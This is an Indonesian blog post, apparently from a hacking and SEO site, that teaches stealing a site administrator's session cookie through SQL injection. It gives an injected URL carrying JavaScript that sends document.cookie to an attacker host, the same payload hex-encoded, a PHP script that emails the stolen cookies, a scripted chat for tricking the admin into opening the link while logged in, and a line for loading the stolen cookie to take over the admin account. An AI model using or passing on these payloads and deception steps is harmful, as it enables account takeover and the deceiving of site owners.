• Beranda
  • Autosultan
  • Bitcoin
  • Dollar
  • Linux
  • LOKER
  • Printer
  • Sofware
  • sosial
  • TISniper
  • Virus
  • Windows

T.I Sniper

#Expert Advisor for MetaTrader 4 #Expert Advisor for MetaTrader 5 #youtube #google #free dollar business every day #Lowongan #Pekerjaan #Loker #forex #trading Autopilot #mining crypto #Update #Tutorial #Komputer Perbaikan, #Email #Facebook , #whatsapp ,#instagram #telegram ,#Internet ,#Motivasi , #Crypto , #AirDrop, #Bitcoin, #Ethereum, #Binance coin, #Cardano, #Degocoin, #Litecoin #Indodax, #Coinbase, #Nexo Dan Mata Uang Digital Lain , #Website, Perbaikan #Server #Domain , #Hosting, #Whm

    • Beranda
    • Contact Forum
    • Coffee JKs88
    • Tentang Kami
    • Parse Code Html
    • Text Terbalik
    • Privacy Policy

    Ikuti Kami!

    Follow Akun Instagram Kami Dapatkan Notifikasi Terbaru!
    Ikuti Kami di Facebok! Untuk mendapatkan notifikasi terbaru.

    Postingan Populer

    Backlink dengan Google Dork Seo

    Dork Seo
    Januari 01, 2016
    0

    Cara Dapat Backlink dengan Google Dork

    Dork Seo
    Februari 13, 2016
    0

    Cara Dapat Backlink Edu Gratis

    Seo
    Februari 13, 2016
    0

    Download File ISO Windows 11 Dan Bootable USB Rufus

    Sofware Windows
    Desember 02, 2021
    0

    FORUM 

    FORUM
    Desember 31, 2021
    0
    Author
    chmood
    Tautan disalin ke papan klip!
    Share Posts "Cookie Stealing over SQL Injection"
  • Salin link
  • Simpan Ke Daftar Bacaan
  • Bagikan ke Facebook
  • Bagikan ke Twitter
  • Bagikan ke Pinterest
  • Bagikan ke Telegram
  • Bagikan ke Whatsapp
  • Bagikan ke Tumblr
  • Bagikan ke Line
  • Bagikan ke Email
  • HomeExploitationsCookie Stealing over SQL Injection
    Cookie Stealing over SQL Injection

    Cookie Stealing over SQL Injection

    Simpan Postingan

    dari SQLInjection kita bisa mencuri cookies dari sang admin. benarkah? benar banget.

    klo kita sudah dapet username + password, tapi gak bisa decrypt, dan tetep gak bisa masuk, ada baiknya mencoba trik ini.

    tekniknya sama persis dengan deface temporer melalui sql.

    contoh

    www.embuh.php?id=-1+union+select+1,2,3,4,5--

    trus yang keluar adalah angga 3. maka kita inject di angka 3 tersebut. apa yang di inject? bukan command sql, tetapi javascript kayak gini:

    <script>window.location=\"http://www.site-attacker.com/log-xss.php?cookie=document.cookie\";</script>

    so, kayak gini:

    www.embuh.php?id=-1+union+select+1,2,\'<script>window.location=\"http://www.site-attacker.com/log-xss.php?cookie=document.cookie+\'\\nsite:www.embuh.com\'\";</script>\',4,5--

    kemudian coba. pasti error. hehehe. maka, kita harus mengenkripsinya kedalam hexa biar bisa dibaca oleh mysql.
    convertnya disini:

    http://tools.explorecrew.org/enc-dec.php?cat=enc

    masukin tuh javascript. hasilnya kayak gini:

    266c743b7363726970742667743b77696e646f772e6c6f636174696f6e3d5c2671756f743b687474703a2f2f7777772e736974652d61747461636b65722e636f6d2f6c6f672d7873732e7068703f636f6f6b69653d646f63756d656e742e636f6f6b69655c2671756f743b3b266c743b2f7363726970742667743b



    nah, trus masukin ke injeksi sql. jangan lupa di depanya kasih 0x. jadinya kayak gini (ini hanya contoh, sesuaikan dgn kebutuhan):

    www.embuh.php?id=-1+union+select+1,2,0x266c743b7363726970742667743b77696e646f772e6c6f636174696f6e3d5c2671756f743b687474703a2f2f7777772e736974652d61747461636b65722e636f6d2f6c6f672d7873732e7068703f636f6f6b69653d646f63756d656e742e636f6f6b69655c2671756f743b3b266c743b2f7363726970742667743b,4,5--



    buat ngelog filenya, cukup gini aja:

    log-xss.php

    $email = \"emailkamu@apaaja.com\";
    $headers = \"From: xsslog@gmail.com\\r\\n\" .
    \"Reply-To: gak.usah@di.reply.bro\\r\\n\" .
    \"X-Mailer: PHP/\".phpversion();

    $isi = $_GET[cookie];

    @mail($email, \"cookie log\", $isi, $headers);

    //jangan lupa redirek ke siet sasaran lagi
    header(\"location: http://www.embuh.com\");




    nah, trus maen soceng sedikit ke admin, kirim email ke admin ato ngechat via fb/ym/apa aja deh yg penting sampe ke si admin.

    A <- aq
    M <- mimin

    A: hay min...
    M: halo bro
    A: ada bug tuh di site ente
    M: masa sih. coba mana buktinya
    A: di bilangin kok gak percaya. coba situ login admin <--- suruh admin login dulu. kan kita mau nyuri cookie nya dia.
    M: iya ini udah login
    A: nah, coba u buka nih link, keliatan jelas banget ada bug di site ente
    A: nih: [url yg tadi udah di injeksi]
    M: oke deh. tekape
    M: eh kok ngeblank ya? redirek ke halaman laen gitu
    A: y ntuh bug nye. segera y perbaiki ya
    M: oke deh. tengkiyu :* <--- admin nya agak maho





    cookie akan terkirim ke email. buka cookie. misal dapetnya kayak gini:
    dlfkjslfkjs984ry09dlskfjdslfjdsfds;fldskfljdsflkjdskl

    buka site sasaran. lalu dengan sedikit javascript injection, masukkan cookie ke browser.

    javascript:void(document.cookie=\"dlfkjslfkjs984ry09dlskfjdslfjdsfds;fldskfljdsflkjdskl\");



    ato dengan tool cookie setter yg u punya deh.



    trus buka halaman admin nya. dan, selamat menikmati... :)
    Exploitations
    September 22, 2015 • 0 komentar
    Disclaimer: gambar, artikel ataupun video yang ada di web ini terkadang berasal dari berbagai sumber media lain. Hak Cipta sepenuhnya dipegang oleh sumber tersebut. Jika ada masalah terkait hal ini, Anda dapat menghubungi kami di halaman ini.
    Isi dari komentar adalah tanggung jawab dari pengirim. T.I Sniper mempunyai hak untuk tidak memperlihatkan komentar yang tidak etis atau kasar. Jika ada komentar yang melanggar aturan ini, tolong dilaporkan.

    T.I Sniper

    Your description here

    • Follow
    • Autosultan
    • Wa Admin Bisnis
    Copyright ©2010 - 2022 🔥 T.I Sniper.
    • Beranda
    • Cari
    • Posting
    • Trending
    • Tersimpan